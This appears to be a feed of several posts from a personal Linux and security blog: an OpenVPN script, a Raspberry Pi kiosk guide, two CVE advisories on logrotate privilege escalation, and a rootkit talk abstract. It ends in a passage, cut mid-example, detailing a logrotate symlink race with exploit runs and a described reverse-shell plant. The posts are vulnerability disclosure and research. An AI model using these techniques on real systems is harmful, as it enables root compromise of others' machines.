Linux https://tech.feedyourhead.at/ en OpenVPN: updating /etc/resolv.conf https://tech.feedyourhead.at/content/openvpn-updating-resolv.conf <span class="field field--name-title field--type-string field--label-hidden">OpenVPN: updating /etc/resolv.conf</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>OpenVPN comes with example-scripts to update <em>/etc/resolv.conf</em> using "resolvconf" or systemd-resolvconf. I don't use one of them therefore I <a href="https://github.com/whotwagner/update-resolv.conf.git">modified the script</a> so that it simply changes <em>/etc/resolv.conf </em>directly. I placed a variable "IMMUTEABLE" in this script. If IMMUTEABLE is set to 1, this script will change the fileattribute of /etc/resolv.conf to immuteable. In that way it is possible to prevent other programms like dhcp-clients to change /etc/resolv.conf while openvpn is running. I know, it's a little bit hacky, but it works for me. <a href="https://github.com/whotwagner/update-resolv.conf.git">The full source can be downloaded at github.com.</a></p></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Dec 26 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/tricks" hreflang="en">Tricks</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/bash" hreflang="en">Bash</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/openssl" hreflang="en">openssl</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/downloads" hreflang="en">Downloads</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=287&amp;2=comment&amp;3=comment" token="vHuPEwt9plgjYIf1hOZjt_5xBLAxtApjH9TdXBk7p8s"></drupal-render-placeholder> </section> Thu, 26 Dec 2019 16:45:26 +0000 Hoti 287 at https://tech.feedyourhead.at HackADay: A Christmas-Machine(Merry Christmas) https://tech.feedyourhead.at/content/hackaday-a-christmas-machine <span class="field field--name-title field--type-string field--label-hidden">HackADay: A Christmas-Machine(Merry Christmas)</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>This year I want to send you merry christmas by creating a blog-entry for a raspberry pi christmas project. The "christmas-machine" displays merry christmas and wishes for the "christkind" on a tft display for the raspberry. It is possible to send christmas wishes using a web applications that can be accessed via wifi. I placed this installation at the coffee-kitchen in the office and it was very nice to see that my colleges had a lot of fun with it.</p> <p>Blesses for "Brother Patrick" who spent me that wonderful Joy-IT TFT display.</p> <p> <video controls="" height="360" width="480"><source src="/sites/default/files/DateiUploads/xmasdev.mp4" type="video/mp4" /></video> </p> <h2>Install Joy-IT TFT3.2</h2> This is a very short installation guide for this display. Please visit the documentation for this display to see the <a href="http://anleitung.joy-it.net/wp-content/uploads/2017/04/RB-TFT3.2_RB-TFT3.5_Manual.pdf">full installation guide</a>. Edit /boot/config.txt <pre><code> dtparam=spi=on dtoverlay=joy-IT-Display-Driver-32b-overlay:rotate=270,swapxy=1 </code></pre> Edit /boot/cmdline.txt and add "fbcon=map:10" <pre><code> console=serial0,115200 console=tty1 root=PARTUUID=6c586e13-02 rootfstype=ext4 elevator=deadline fsck.repair=yes rootwait fbcon=map:10 </code></pre> Install xorg-modules: <pre><code> apt-get install xorg xorg-docs-core xserver-xorg xserver-xorg-core xserver-xorg-input-all xserver-xorg-input-libinput xserver-xorg-input-wacom xserver-xorg-legacy xserver-xorg-video-all xserver-xorg-video-amdgpu xserver-xorg-video-ati xserver-xorg-video-fbdev xserver-xorg-video-fbturbo xserver-xorg-video-nouveau xserver-xorg-video-radeon xserver-xorg-video-vesa </code></pre> Edit /usr/share/X11/xorg.conf.d/99-calibration.conf: <pre><code> Section "InputClass" Identifier "calibration" MatchProduct "ADS7846 Touchscreen" Option "Calibration" "160 3723 3896 181" Option "SwapAxes" "1" Option "TransformationMatrix" "1 0 0 0 -1 1 0 0 1" EndSection </code></pre> Edit /usr/share/X11/xorg.conf.d/99-fbturbo.conf and set fbdev to "/dev/fb1" <pre><code> Section "Device" Identifier "Allwinner A10/A13 FBDEV" Driver "fbturbo" Option "fbdev" "/dev/fb1" Option "SwapbuffersWait" "true" EndSection </code></pre> Install the driver: <pre><code> cd /tmp wget anleitung.joy-it.net/upload/joy-IT-Display-Driver-32b-overlay.dtbsudo cp joy-IT-Display-Driver-32b-overlay.dtb /boot/overlays/joy-IT-Display-Driver-32b-overlay.dtbo </code></pre> <h2>Prepare the desktop environment</h2> Install the LXDE-desktop: <pre><code> apt-get install lxde-common lxde-core lxde-icon-theme lxde-settings-daemon openbox-lxde-session lightdm lightdm-gtk-greeter chromium-browser unclutter </code></pre> Set autologin for user pi in lightdm: <pre><code> autologin-guest=false autologin-user=pi autologin-user-timeout=0 </code></pre> Edit /etc/xdg/lxsession/LXDE/autostart and remove xscreensaver: <pre><code> @lxpanel --profile LXDE @pcmanfm --desktop --profile LXDE @xset s off @xset -dpms @xset s noblank </code></pre> <b>Reboot</b> Edit /home/pi/.config/lxsession/LXDE/autostart: <pre><code> @lxpanel --profile LXDE @pcmanfm --desktop --profile LXDE @/home/pi/startxmas.sh @xset s off @xset -dpms @xset s noblank </code></pre> Remove software: <pre><code> apt-get remove light-locker wpasupplicant </code></pre> Edit /home/pi/startxmas.sh: <pre><code> #!/bin/bash DISPLAY=:0.0 unclutter & DISPLAY=:0.0 chromium-browser --kiosk --disable-restore-session-state --disable-features=TranslateUI --disable-session-crashed-bubble http://localhost/tree.html </code></pre> <h2>Install the Access-Point</h2> <pre><code> apt-get install hostapd dnsmasq </code></pre> Edit /etc/hostapd/hostapd.conf: <pre><code> interface=wlan0 driver=nl80211 ssid=xmas hw_mode=g channel=11 macaddr_acl=0 </code></pre> Edit /etc/dhcpcd.conf and add the following lines at the end of the file: <pre><code> interface wlan0 static ip_address=10.0.0.1/24 </code></pre> Edit /etc/dnsmasq.d/dhcp: <pre><code> dhcp-authoritative dhcp-range=10.0.0.50,10.0.0.150,12h address=/\#/10.0.0.1 interface=wlan0 </code></pre> Edit /etc/default/hostapd and modify DAEMON_CONF: <pre><code> DAEMON_CONF="/etc/hostapd/hostapd.conf" </code></pre> Configure autostart for hostapd: <pre><code> systemctl daemon-reload systemctl unmask hostapd systemctl enable hostapd </code></pre> <h2>Configure the webservice</h2> <pre><code> apt-get install apache2 php7.3 php7.3-cli php7.3-json git </code></pre> Download the Webfiles: <pre><code> git clone https://github.com/whotwagner/xmas2019.git /tmp/xmas2019 cp -r /tmp/xmas2019/* /var/www/html/ chown www-data /var/www/html/wishes </code></pre> </b>Reboot</b> <h2>MERRY CHRISTMAS AND A HAPPY NEW YEAR 2020</h2> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Dec 21 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/xmas" hreflang="en">xmas</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/hackaday" hreflang="en">HackADay</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/raspberry" hreflang="en">Raspberry</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Fun" hreflang="en">Fun</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/debian" hreflang="en">Debian</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=286&amp;2=comment&amp;3=comment" token="bOpcwG6QkMNce10GTTONTe1gk3UOW4gOFZ8auDQ32WI"></drupal-render-placeholder> </section> Sat, 21 Dec 2019 20:28:14 +0000 Hoti 286 at https://tech.feedyourhead.at CVE-2019-15741: Privilege Escalation via Logrotate in Gitlab Omnibus https://tech.feedyourhead.at/content/Privilege-Escalation-via-Logrotate-in-Gitlab-Omnibus-CVE-2019-15741 <span class="field field--name-title field--type-string field--label-hidden">CVE-2019-15741: Privilege Escalation via Logrotate in Gitlab Omnibus</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><h3>Overview</h3> <ul><li>Identifier: AIT-SA-20190930-01</li> <li>Target: GitLab Omnibus</li> <li>Vendor: GitLab</li> <li>Version: 7.4 through 12.2.1</li> <li>Fixed in Version: 12.2.3, 12.1.8 and 12.0.8</li> <li>CVE: CVE-2019-15741</li> <li>Accessibility: Local</li> <li>Severity: Low</li> <li>Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)</li> </ul><h3>Vulnerability Description</h3> <p>GitLab Omnibus sets the ownership of the log directory to the system-user "git", which might let local users obtain root access because of unsafe interaction with logrotate.</p> <h3>Vulnerable Versions</h3> <p>7.4 through 12.2.1</p> <h3>Impact</h3> <p>An attacker who already achieved a valid shell as user “git” could elevate the privileges to “root”. The fact that another exploit is needed to get a shell lowers the severity from high to low.</p> <h3>Advisory URL</h3> <p><a href="http://www.ait.ac.at/ait-sa-20190930-01-privilege-escalation-via-logrotate-in-gitlab-omnibus">http://www.ait.ac.at/ait-sa-20190930-01-privilege-escalation-via-logrotate-in-gitlab-omnibus</a></p> <h3>References:</h3> <ul><li><a href="https://about.gitlab.com/2019/08/29/security-release-gitlab-12-dot-2-dot-3-released/">https://about.gitlab.com/2019/08/29/security-release-gitlab-12-dot-2-dot-3-released/</a> </li> <li><a href="https://gitlab.com/gitlab-org/omnibus-gitlab/issues/4380">https://gitlab.com/gitlab-org/omnibus-gitlab/issues/4380</a> </li> <li><a href="https://hackerone.com/reports/578119">https://hackerone.com/reports/578119</a></li> </ul><p> </p></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Oct 04 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/git" hreflang="en">git</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=279&amp;2=comment&amp;3=comment" token="tPzTCpXOHPQznS0cKjokuCN09WJl_ncAA7gp79vmOxc"></drupal-render-placeholder> </section> Fri, 04 Oct 2019 11:25:05 +0000 Hoti 279 at https://tech.feedyourhead.at Privilege escalation in groonga-httpd (CVE-2019-11675) https://tech.feedyourhead.at/content/privilege-escalation-in-groonga-httpd <span class="field field--name-title field--type-string field--label-hidden">Privilege escalation in groonga-httpd (CVE-2019-11675)</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><h3>Overview</h3> <ul> <li>System affected: Debian packages of groonga/-httpd 6.1.5-1</li> <li>Software-Version: 6.1.5-1</li> <li>User-Interaction: Not required</li> <li>Impact: Local root</li> <li>CVE: CVE-2019-11675</li> </ul> <h3>Detailed Description</h3> <p>The path of the logdirectory of groonga-httpd can be manipulated by user groonga:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">ls</span> <span style="color: #660033;">-l</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>groonga total <span style="color: #000000;">8</span> <span style="color: #660033;">-rw-r--r--</span> <span style="color: #000000;">1</span> root root <span style="color: #000000;">1296</span> Apr <span style="color: #000000;">25</span> <span style="color: #000000;">18</span>:<span style="color: #000000;">44</span> groonga.log drwxr-xr-x <span style="color: #000000;">2</span> groonga groonga <span style="color: #000000;">4096</span> Apr <span style="color: #000000;">25</span> <span style="color: #000000;">18</span>:<span style="color: #000000;">55</span> httpd</pre></div></pre> <p>The files in /var/log/groonga/httpd/*.log are once a day rotated by logrotate as user root with the following config:</p> <pre> /var/log/groonga/httpd/*.log { daily missingok rotate 30 compress delaycompress notifempty create 640 groonga groonga sharedscripts postrotate . /etc/default/groonga-httpd if [ x"$ENABLE" = x"yes" ]; then /usr/bin/curl --silent --output /dev/null \ "http://127.0.0.1:10041/d/log_reopen" fi endscript } </pre> <p>Due to <a href="https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition">logrotate is prone to a race-condition</a> it is possible for user "groonga" to replace the directory /var/log/groonga/httpd with a symbolik link to any directory(for example /etc/bash_completion.d). logrotate will place files AS ROOT into /etc/bash_completition.d and set the owner and group to "groonga.groonga". An attacker could simply place a reverse-shell into this file. As soon as root logs in, a reverse shell will be executed then.</p> <h3>Exploit</h3> <p>A proof-of-concept exploit can be found at <a href="https://github.com/whotwagner/logrotten">https://github.com/whotwagner/logrotten</a></p> <h3>Mitigation</h3> <p>The problem can be mitigated by changing the owner and group of /var/log/groonga to root, or by using the "su option" inside the logrotate-configfile.</p> <h3>Credits</h3> <p>This bug was discovered by Wolfgang Hotwagner(https://tech.feedyourhead.at/content/privilege-escalation-in-groonga-httpd)</p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">May 07 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/debian" hreflang="en">Debian</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/c" hreflang="en">C</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=278&amp;2=comment&amp;3=comment" token="gm3BXsVi-55Kr8NZ8Sqnkq-hgDkw5pOYeXcWUQ1uut0"></drupal-render-placeholder> </section> Tue, 07 May 2019 20:32:56 +0000 Hoti 278 at https://tech.feedyourhead.at Anatomy of a Linux container rootkit https://tech.feedyourhead.at/content/anatomy-of-a-linux-container-rootkit <span class="field field--name-title field--type-string field--label-hidden">Anatomy of a Linux container rootkit </span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>This year I gave a talk at the <a href="https://eh19.easterhegg.eu">Easterhegg 2019</a> about a Linux kernel rootkit that can handle containers. I mainly presented my Bachelor work from 2017 with some improvements.</p> <h2>Abstract</h2> <p>Linux Containers are becoming increasingly popular. Therefore, it is likely that there will be an increase of attacks against container systems. After successfully attacking all the security mechanisms of a container system, a “rootkit“ could be planted. This talk provides details of the anatomy of such a rootkit. First the main functions of rootkits are explained. After a brief introduction of Linux Containers and Linux Kernel Rootkits, a Kernel Rootkit called “themaster“, developed by the author of this thesis, is described and explained. Well known rootkit methods are used to implement functions to hide resources and escalate privileges. Results indicate that in container systems, patching system calls are the preferred method for functions which are globally accessible. For providing rootkit functionality in specific containers, patching the virtual file system is the better approach. A special backdoor for breaking out of the container is also applied and “themaster“ operates stealthily.</p> <h2>Talk</h2> <p><iframe allowfullscreen="" frameborder="0" height="576" src="https://media.ccc.de/v/eh19-168-anatomie-eines-containerfhigen-linux-kernel-rootkits/oembed" width="800"></iframe></p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">May 07 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/c" hreflang="en">C</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/kernel" hreflang="en">Kernel</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/docker" hreflang="en">Docker</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=277&amp;2=comment&amp;3=comment" token="A4P5IdLVLXs7imc4kAPeqdjBNNH5UZ2lfM9NktsbF-U"></drupal-render-placeholder> </section> Tue, 07 May 2019 20:03:34 +0000 Hoti 277 at https://tech.feedyourhead.at Details of a logrotate race-condition https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition <span class="field field--name-title field--type-string field--label-hidden">Details of a logrotate race-condition</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p> </p> <p>Logrotate is prone to a race-condition on systems with a log directory that is in control of a low privileged user. A malicious user could trick logrotate to create files in any directory if it is executed as root. This might lead into a privileged escalation.</p> <h2>Description</h2> <p>In the linux man page logrotate is described as follows:</p> <blockquote> <p><strong>logrotate</strong> is designed to ease administration of systems that generate large numbers of log files. It allows automatic rotation, compression, removal, and mailing of log files. Each log file may be handled daily, weekly, monthly, or when it grows too large.</p> </blockquote> <p>On most linux distributions, logrotate is executed automatically once a day as user root.</p> <p>Logrotate supports different methods for creating new files. For example the directive "copy" makes a copy of the logfile and "create" creates a new empty logfile after rotating. If someone exchanges the log directory with a symbolic link just before creating the new logfile, logrotate will put the new file into a different directory.</p> <p>As shown in the diagram below such a scenario can be exploited if logrotate runs as user root and a low privileged user is in control of the path to the log directory. If this user exchanges the log directory with a symbolic link at the right time, logrotate will write the new file into the linked directory. After that the permissions of the created file will be adjusted and the attacker might have write access to that file.</p> <p><img alt="logrotate race-condition squence diagram" data-entity-type="file" data-entity-uuid="7107350b-2651-4742-bc62-18893ffd5e17" src="/sites/default/files/inline-images/sequence.png" /></p> <h2>Exploit</h2> <p>The race-condition can be exploited by setting a inotify-hook at the logfile. As soon as logrotate hits the logfile, the exploit gets notified and exchanges the log directory by a symbolic link to /etc/bash_completion.d. Logrotate will then create the new logfile into /etc/bash_completion.d as root and will adjust the owner and permissions of that file afterwards. The new logfile will be writable if logrotate is configured to set the owner of the file to the uid of the malicious user. Therefore the attacker can write a payload for a reverse shell into this file. As soon as root logs in, the reverse shell will be executed and spawns a root shell for the attacker.</p> <p>An implementation of such an exploit could be found at <a href="https://github.com/whotwagner/logrotten">https://github.com/whotwagner/logrotten</a></p> <p>Using inotify has its limitations. It is too slow on filesystems that are on top of lvm2-volumes or overlayfs.</p> <h2>Examples</h2> <p>The following examples show different setups in which logrotate can be exploited:</p> <h3>1) Logfile owner is a user. Compress option is set</h3> <p>In this example the path is in control of user alice and the “compress”-directive is set in logrotate. The exploit hooks the IN_OPEN-operation of the file file.log.1. After the daily run of logrotate, a file with owner alice can be found at <i>/</i><i>etc/bash_completion.d/file.log.1.gz.</i></p> <p>The log directory is inside the home directory of user alice:</p> <pre><div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">  drwxr-xr-x <span style="color: #000000;">2</span> alice alice <span style="color: #000000;">4096</span> Apr <span style="color: #000000;">30</span> 09:<span style="color: #000000;">40</span> <span style="color: #000000; font-weight: bold;">/</span>home<span style="color: #000000; font-weight: bold;">/</span>alice<span style="color: #000000; font-weight: bold;">/</span>logdir </pre></div></pre> <p>Alice has permissions for writing to the logfile:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">  <span style="color: #660033;">-rw-r--r--</span> <span style="color: #000000;">1</span> alice alice <span style="color: #000000;">200000</span> Apr <span style="color: #000000;">30</span> 09:<span style="color: #000000;">40</span> <span style="color: #000000; font-weight: bold;">/</span>home<span style="color: #000000; font-weight: bold;">/</span>alice<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>file.log </pre></div></pre> <p>The directive "compress" is used inside the logrotate configuration:</p> <pre> <code> /home/alice/logdir/file.log { daily rotate 12 missingok notifempty size 1k compress } </code></pre> <p>Alice runs the exploit by setting the hook to file.log.1 and with the parameter for compression. The exploit gets executed when cron runs logrotate as root:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;"><span style="color: #666666;">alice@localhost$ </span>.<span style="color: #000000; font-weight: bold;">/</span>logrotten <span style="color: #660033;">-c</span> <span style="color: #000000; font-weight: bold;">/</span>home<span style="color: #000000; font-weight: bold;">/</span>alice<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>file.log.1 Waiting <span style="color: #000000; font-weight: bold;">for</span> rotating <span style="color: #000000; font-weight: bold;">/</span>home<span style="color: #000000; font-weight: bold;">/</span>alice<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>file.log.1... Renamed <span style="color: #000000; font-weight: bold;">/</span>home<span style="color: #000000; font-weight: bold;">/</span>alice<span style="color: #000000; font-weight: bold;">/</span>logdir with <span style="color: #000000; font-weight: bold;">/</span>home<span style="color: #000000; font-weight: bold;">/</span>alice<span style="color: #000000; font-weight: bold;">/</span>logdir2 and created symlink to <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>bash_completion.d Done<span style="color: #000000; font-weight: bold;">!</span></pre></div></pre> <p>The compressed logfile is created in /etc/bash_completion.d with owner alice:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;"><span style="color: #660033;">-rw-r--r--</span> <span style="color: #000000;">1</span> alice alice <span style="color: #000000;">200053</span> Apr <span style="color: #000000;">30</span> 09:<span style="color: #000000;">40</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>bash_completion.d<span style="color: #000000; font-weight: bold;">/</span>file.log.1.gz</pre></div></pre> <h3>2) Logfile owner is root.root but with acl’s that permit a user to write the logfile.</h3> <p>This example illustrates a case where the insecure configuration is not obvious. User root owns the complete path and the logfile. But there are ACL’s set that allows user www-data to modify the directory /var/www/project and the logfile /var/www/project/logdir/file.log. As soon as logrotate triggers the exploit, a new file /etc/bash_completion.d/file.log will be created and the ACL’s copied.</p> <p>Permissions of the log directory. It is owned by root but ACL’s are in use:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">drwxrwxr-x+ <span style="color: #000000;">2</span> root root <span style="color: #000000;">4096</span> Apr <span style="color: #000000;">30</span> <span style="color: #000000;">17</span>:09 <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>logdir</pre></div></pre> <p>The logfile is also woned by root with ACL’s set:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">-rw-rw-r--+ <span style="color: #000000;">1</span> root root <span style="color: #000000;">12</span> Apr <span style="color: #000000;">30</span> <span style="color: #000000;">17</span>:09 <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>file.log</pre></div></pre> <p>Access control list of /var/www/project:</p> <pre> <code> # file: var/www/project # owner: root # group: root user::rwx user:www-data:rwx group::r-x mask::rwx other::r-x </code></pre> <p>Access control list of /var/www/project/logdir:</p> <pre> <code> # file: var/www/project/logdir # owner: root # group: root user::rwx user:www-data:rwx group::r-x mask::rwx other::r-x default:user::rwx default:user:root:rwx default:user:www-data:rwx default:group::r-x default:mask::rwx default:other::r-x </code></pre> <p>Logrotate configuration with "create root root":</p> <pre> <code> /var/www/project/logdir/file.log { daily rotate 12 missingok notifempty size 1k create root root } </code></pre> <p>www-data executes the exploit and waits until logrotate will be started by cron:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">www-data<span style="color: #000000; font-weight: bold;">@</span>localhost$ .<span style="color: #000000; font-weight: bold;">/</span>logrotten <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>file.log Waiting <span style="color: #000000; font-weight: bold;">for</span> rotating <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>file.log... Renamed <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>logdir with <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>logdir2 and created symlink to <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>bash_completion.d Done<span style="color: #000000; font-weight: bold;">!</span></pre></div></pre> <p>The new file is created in /etc/bash_completition.d with owner root and with ACL’s set:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;"> -rw-rw-r--+ <span style="color: #000000;">1</span> root root <span style="color: #000000;">0</span> Apr <span style="color: #000000;">30</span> <span style="color: #000000;">17</span>:<span style="color: #000000;">16</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>bash_completion.d<span style="color: #000000; font-weight: bold;">/</span>file.log </pre></div></pre> <p>Access control list of /etc/bash_completion.d/file.log:</p> <pre> <code> # file: etc/bash_completion.d/file.log # owner: root # group: root user::rw- user:root:rwx #effective:rw- user:www-data:rwx #effective:rw- group::r-x #effective:r-- mask::rw- other::r-- </code></pre> <h3>3) Parent directory is secure and owned by root, but another directory above the parent is writable by a user. The logfile is owned by root.</h3> <p>This example shows that it is not enough to ensure that the logdir and its parent is owned by root. As long as one directory of the complete path can be modified by a user, logrotate could be exploited.</p> <p>Root owns /var/www/project/html:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">drwxr-xr-x <span style="color: #000000;">3</span> root root <span style="color: #000000;">4096</span> Apr <span style="color: #000000;">30</span> <span style="color: #000000;">17</span>:<span style="color: #000000;">26</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>html<span style="color: #000000; font-weight: bold;">/</span> </pre></div></pre> <p>Root owns /var/www/project/html/logdir/:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">  drwxr-xr-x <span style="color: #000000;">2</span> root root <span style="color: #000000;">4096</span> Apr <span 